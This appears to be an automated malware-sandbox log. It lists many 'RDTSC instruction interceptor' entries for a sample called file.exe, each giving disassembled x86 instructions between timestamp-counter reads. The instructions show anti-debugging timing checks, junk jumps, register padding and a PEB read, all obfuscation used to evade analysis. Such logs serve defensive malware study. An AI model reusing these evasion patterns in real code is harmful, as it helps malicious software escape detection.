Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71900C7 second address: 7190125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC3313C0922h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FC3313C091Bh 0x0000000f adc esi, 0660B2DEh 0x00000015 jmp 00007FC3313C0929h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f jmp 00007FC3313C0921h 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190125 second address: 7190129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190129 second address: 719012D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 719012D second address: 7190133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190133 second address: 7190148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3313C0921h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190148 second address: 719016D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC330B7B108h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 719016D second address: 719017F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3313C091Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 719017F second address: 719018E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a mov ch, 9Dh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71902C8 second address: 71902CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71902CE second address: 71902D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71902D2 second address: 71902D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71902D6 second address: 7190320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000044h 0x0000000a jmp 00007FC330B7B0FFh 0x0000000f pop edi 0x00000010 jmp 00007FC330B7B106h 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 mov cl, 2Dh 0x00000019 mov bh, 8Eh 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov cx, 27CDh 0x00000024 jmp 00007FC330B7B0FAh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190320 second address: 7190377 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC3313C0926h 0x0000000f push dword ptr [eax] 0x00000011 jmp 00007FC3313C0920h 0x00000016 mov eax, dword ptr fs:[00000030h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC3313C0927h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190377 second address: 719037D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190480 second address: 7190511 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, esi 0x00000008 popad 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC3313C0924h 0x00000013 and ecx, 22A978A8h 0x00000019 jmp 00007FC3313C091Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FC3313C0928h 0x00000025 jmp 00007FC3313C0925h 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr [esi+08h], eax 0x0000002f jmp 00007FC3313C091Eh 0x00000034 mov dword ptr [esi+0Ch], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FC3313C0927h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190511 second address: 7190529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC330B7B104h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190529 second address: 7190554 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+4Ch] 0x0000000b jmp 00007FC3313C0927h 0x00000010 mov dword ptr [esi+10h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190554 second address: 719056F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B107h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 719056F second address: 7190575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190575 second address: 719059D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+50h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov esi, 23461BEFh 0x00000013 jmp 00007FC330B7B104h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 719059D second address: 71905A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71905A2 second address: 71905A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71905A8 second address: 7190623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esi+14h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ecx 0x0000000e mov bh, B5h 0x00000010 popad 0x00000011 mov di, cx 0x00000014 popad 0x00000015 mov eax, dword ptr [ebx+54h] 0x00000018 jmp 00007FC3313C0926h 0x0000001d mov dword ptr [esi+18h], eax 0x00000020 jmp 00007FC3313C0920h 0x00000025 mov eax, dword ptr [ebx+58h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push ebx 0x0000002c pop ecx 0x0000002d pushfd 0x0000002e jmp 00007FC3313C0929h 0x00000033 sbb ax, BE76h 0x00000038 jmp 00007FC3313C0921h 0x0000003d popfd 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190623 second address: 7190678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FC330B7B103h 0x0000000b sbb si, E3AEh 0x00000010 jmp 00007FC330B7B109h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esi+1Ch], eax 0x0000001c jmp 00007FC330B7B0FEh 0x00000021 mov eax, dword ptr [ebx+5Ch] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190678 second address: 7190695 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190695 second address: 71906E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 07D2h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+20h], eax 0x0000000f jmp 00007FC330B7B0FFh 0x00000014 mov eax, dword ptr [ebx+60h] 0x00000017 jmp 00007FC330B7B106h 0x0000001c mov dword ptr [esi+24h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC330B7B107h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71906E8 second address: 7190756 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC3313C0923h 0x00000013 xor esi, 62BC43EEh 0x00000019 jmp 00007FC3313C0929h 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [esi+28h], eax 0x00000023 jmp 00007FC3313C091Eh 0x00000028 mov eax, dword ptr [ebx+68h] 0x0000002b pushad 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190756 second address: 719079D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 61ADE1B9h 0x00000009 popad 0x0000000a call 00007FC330B7B106h 0x0000000f mov edx, esi 0x00000011 pop ecx 0x00000012 popad 0x00000013 mov dword ptr [esi+2Ch], eax 0x00000016 jmp 00007FC330B7B0FDh 0x0000001b mov ax, word ptr [ebx+6Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC330B7B0FDh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 719079D second address: 71907F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d jmp 00007FC3313C091Eh 0x00000012 mov ax, word ptr [ebx+00000088h] 0x00000019 jmp 00007FC3313C0920h 0x0000001e mov word ptr [esi+32h], ax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FC3313C0927h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71907F8 second address: 71907FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71907FE second address: 7190802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190802 second address: 7190830 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+0000008Ch] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC330B7B105h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190830 second address: 719089A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC3313C091Ch 0x00000013 sub ch, FFFFFFD8h 0x00000016 jmp 00007FC3313C091Bh 0x0000001b popfd 0x0000001c call 00007FC3313C0928h 0x00000021 jmp 00007FC3313C0922h 0x00000026 pop eax 0x00000027 popad 0x00000028 mov eax, dword ptr [ebx+18h] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 719089A second address: 71908A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71908A0 second address: 71908E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC3313C091Bh 0x00000008 pop eax 0x00000009 mov bh, 6Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+38h], eax 0x00000011 jmp 00007FC3313C0920h 0x00000016 mov eax, dword ptr [ebx+1Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC3313C0927h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71908E3 second address: 7190940 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B109h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c jmp 00007FC330B7B0FEh 0x00000011 mov eax, dword ptr [ebx+20h] 0x00000014 jmp 00007FC330B7B100h 0x00000019 mov dword ptr [esi+40h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC330B7B107h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190940 second address: 7190969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+00000080h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190969 second address: 719096D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 719096D second address: 7190980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190AA1 second address: 7190AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190AA7 second address: 7190AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190AAB second address: 7190AD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B103h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d call 00007FC330B7B0FFh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190B12 second address: 7190B18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190B18 second address: 7190B95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d jmp 00007FC330B7B102h 0x00000012 js 00007FC39E7E9C82h 0x00000018 pushad 0x00000019 jmp 00007FC330B7B0FEh 0x0000001e call 00007FC330B7B102h 0x00000023 mov di, si 0x00000026 pop eax 0x00000027 popad 0x00000028 mov eax, dword ptr [ebp-0Ch] 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FC330B7B106h 0x00000034 xor ch, FFFFFFE8h 0x00000037 jmp 00007FC330B7B0FBh 0x0000003c popfd 0x0000003d mov ecx, 04C729DFh 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190B95 second address: 7190B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190B9A second address: 7190BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, DEC4h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FC330B7B104h 0x00000017 and ecx, 49FB3378h 0x0000001d jmp 00007FC330B7B0FBh 0x00000022 popfd 0x00000023 call 00007FC330B7B108h 0x00000028 pop ecx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190BEC second address: 7190C27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC3313C091Eh 0x00000009 xor cx, 5D08h 0x0000000e jmp 00007FC3313C091Bh 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 lea eax, dword ptr [ebx+78h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC3313C091Ch 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190C27 second address: 7190C2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190C2D second address: 7190C69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b jmp 00007FC3313C0920h 0x00000010 nop 0x00000011 jmp 00007FC3313C0920h 0x00000016 push eax 0x00000017 pushad 0x00000018 pushad 0x00000019 push esi 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190C69 second address: 7190C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 pushad 0x00000008 mov di, ax 0x0000000b jmp 00007FC330B7B0FCh 0x00000010 popad 0x00000011 lea eax, dword ptr [ebp-08h] 0x00000014 pushad 0x00000015 pushad 0x00000016 mov cx, 5FB3h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190C8C second address: 7190CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 mov cx, 122Bh 0x0000000a mov eax, 0C3BA607h 0x0000000f popad 0x00000010 popad 0x00000011 nop 0x00000012 jmp 00007FC3313C091Ah 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov eax, 1781B393h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190CB2 second address: 7190CBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190CBA second address: 7190CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190CC8 second address: 7190CCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190CCC second address: 7190CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190D80 second address: 7190DBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B109h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c jmp 00007FC330B7B0FEh 0x00000011 lea eax, dword ptr [ebx+70h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edx 0x00000018 pop esi 0x00000019 mov si, di 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190DBA second address: 7190DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7190F41 second address: 7190F73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B109h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC39E7E9847h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC330B7B0FDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7191095 second address: 71910A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3313C091Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71910A7 second address: 71910AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71910AB second address: 71910C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FC39F02EF3Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC3313C091Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71910C5 second address: 71910E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov dx, cx 0x00000010 mov eax, 2F1BD867h 0x00000015 popad 0x00000016 mov eax, dword ptr [esi] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71910E9 second address: 71910ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71910ED second address: 71910F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71910F3 second address: 71911A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b jmp 00007FC3313C0920h 0x00000010 mov eax, dword ptr [esi+04h] 0x00000013 jmp 00007FC3313C0920h 0x00000018 mov dword ptr [edx+04h], eax 0x0000001b pushad 0x0000001c jmp 00007FC3313C091Eh 0x00000021 pushfd 0x00000022 jmp 00007FC3313C0922h 0x00000027 adc al, FFFFFF88h 0x0000002a jmp 00007FC3313C091Bh 0x0000002f popfd 0x00000030 popad 0x00000031 mov eax, dword ptr [esi+08h] 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FC3313C0924h 0x0000003b or ax, B4E8h 0x00000040 jmp 00007FC3313C091Bh 0x00000045 popfd 0x00000046 push eax 0x00000047 push edx 0x00000048 call 00007FC3313C0926h 0x0000004d pop ecx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71911A2 second address: 71911B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [edx+08h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov cx, di 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71911B2 second address: 7191246 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC3313C091Fh 0x00000008 sub cx, E98Eh 0x0000000d jmp 00007FC3313C0929h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov bx, ax 0x00000018 popad 0x00000019 mov eax, dword ptr [esi+0Ch] 0x0000001c jmp 00007FC3313C091Ah 0x00000021 mov dword ptr [edx+0Ch], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FC3313C091Dh 0x0000002d adc eax, 0168AC76h 0x00000033 jmp 00007FC3313C0921h 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007FC3313C0920h 0x0000003f add ecx, 2FDBF198h 0x00000045 jmp 00007FC3313C091Bh 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7191246 second address: 719126D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+10h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC330B7B108h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 719126D second address: 71912B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC3313C0921h 0x00000008 pop ecx 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+10h], eax 0x00000012 jmp 00007FC3313C0928h 0x00000017 mov eax, dword ptr [esi+14h] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov dx, AED0h 0x00000021 mov ah, dh 0x00000023 popad 0x00000024 rdtsc
